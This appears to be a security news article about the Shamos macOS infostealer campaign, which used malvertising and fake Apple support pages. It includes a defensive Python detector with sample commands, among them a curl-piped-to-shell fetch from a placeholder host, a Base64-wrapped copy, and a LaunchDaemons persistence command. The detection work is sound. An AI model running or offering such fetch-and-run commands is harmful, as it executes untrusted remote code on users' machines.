Security researchers have revealed a new malware campaign that used fake Apple support pages to target Mac users. Between June and August 2025, CrowdStrike’s Falcon platform detected over 300 attempts to deliver Shamos, a variant of the Atomic Stealer malware.
The campaign was traced back to Cookie Spider, a criminal group that rents out malware on a subscription model. Instead of phishing emails, the attackers relied on malvertising. They bought paid search ads so that users searching for simple fixes—like how to flush a DNS cache—were directed to fake support sites.

How the attack worked
Once on these sites, users were told to paste a one-line command into Terminal. While it looked like a legitimate fix, the command bypassed Apple’s Gatekeeper security and downloaded a hidden installer.
At times, the command was plain text. Other times, it was disguised with Base64 encoding. Either way, it installed Shamos, which stole browser data, Apple Keychain entries, Notes, and cryptocurrency wallets. The malware then zipped the stolen data and exfiltrated it using curl, a common macOS tool.
Researchers also found Shamos deploying a fake Ledger Live app and a botnet module to expand its reach. To maintain persistence, it created a LaunchDaemons entry and checked for sandboxed environments to avoid detection.
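A defender's check for the pasted-command pattern described above, written for this article rather than taken from CrowdStrike's detection logic: it flags a fetch-and-pipe-to-shell command, unwraps a Base64 layer around such a command before inspecting it, and notes a LaunchDaemons path. The rule names, the sample commands and the example.invalid host are constructed for the example.

```python
import base64
import re

# Rules for the delivery chain described above: fetch-and-pipe to a shell,
# a Base64 wrapper around such a command, and a LaunchDaemons path for persistence.
# Rule names are this example's own, not CrowdStrike's.
RULES = [
    ("remote-fetch-piped-to-shell",
     re.compile(r"\bcurl\b[^|]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh)\b")),
    ("base64-decoded-into-shell",
     re.compile(r"\bbase64\b\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh)\b")),
    ("launchdaemons-path", re.compile(r"/Library/LaunchDaemons/")),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_tokens(cmd):
    """Decode any long Base64-looking token so a wrapped inner command is inspected too."""
    decoded = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            decoded.append(base64.b64decode(tok, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not real Base64 (or not text): ignore it
    return decoded


def classify_command(cmd):
    """Return the names of all rules hit by one command, outer text and decoded layers alike."""
    hits = []
    for layer in [cmd] + decode_base64_tokens(cmd):
        for name, pattern in RULES:
            if name not in hits and pattern.search(layer):
                hits.append(name)
    return hits


def scan(commands):
    """Map each suspicious command to its rule hits; clean commands are left out."""
    return {c: classify_command(c) for c in commands if classify_command(c)}


# Constructed sample inputs (not real campaign artefacts); example.invalid is a reserved placeholder host.
BENIGN_DNS_FLUSH = "sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder"
PLAIN_FETCH = "curl -fsSL https://example.invalid/fix.sh | sh"
WRAPPED_FETCH = "echo " + base64.b64encode(PLAIN_FETCH.encode()).decode() + " | base64 -D | sh"
PERSIST = "sudo cp helper.plist /Library/LaunchDaemons/ && sudo launchctl load -w /Library/LaunchDaemons/helper.plist"

if __name__ == "__main__":
    for cmd, hits in scan([BENIGN_DNS_FLUSH, PLAIN_FETCH, WRAPPED_FETCH, PERSIST]).items():
        print(hits, "<-", cmd[:60])
```

The LaunchDaemons rule alone is a weak signal, since legitimate installers write there too; it matters when it appears alongside the other hits.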
Why it was effective
The campaign succeeded because it blended social engineering with technical jargon. Many users trusted what looked like Apple's official guidance. By delivering the lure through search ads rather than shady email links or torrent sites, the attackers avoided the channels users have learned to distrust.
Interestingly, the malware avoided targeting Russia and former Soviet states, a common tactic among cybercriminals seeking to avoid local law enforcement.
How to stay safe
Experts urge Mac users to be cautious. Copying Terminal commands from unverified websites poses serious risks. Instead, users should rely on Apple’s official documentation or trusted forums. Installing apps only from the Mac App Store or verified developer sites also helps reduce exposure.
Keeping macOS updated is another key defense. Endpoint protection tools, including CrowdStrike Falcon, can also block malicious scripts in real time. Above all, experts recommend skepticism: a few minutes spent verifying instructions could prevent major data theft.